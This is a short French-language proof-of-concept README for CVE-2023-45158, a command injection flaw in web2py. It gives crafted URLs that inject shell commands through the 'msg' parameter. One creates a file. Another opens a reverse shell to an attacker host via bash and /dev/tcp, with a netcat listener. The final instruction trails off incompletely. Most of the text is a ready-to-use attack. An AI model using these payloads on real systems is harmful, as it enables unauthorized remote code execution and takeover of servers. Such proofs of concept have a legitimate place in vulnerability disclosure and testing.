
Preuve de concept d'exploit pour CVE-2023-45158, une vulnérabilité d'injection de commandes dans web2py. Démontre l'exécution de code à distance via des requêtes HTTP conçues, incluant la création de fichiers et des charges utiles de shell inversé.
cd web2py
python3 web2py.py
http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Remplacez <IP-ADDRESS> et <YOUR-COMMAND> par vos valeurs.http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27
Sur la machine de l'attaquant, exécutez nc -l 127.0.0.1 8080
Allez à l'URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Remplacez .
<ATTACKER-IP>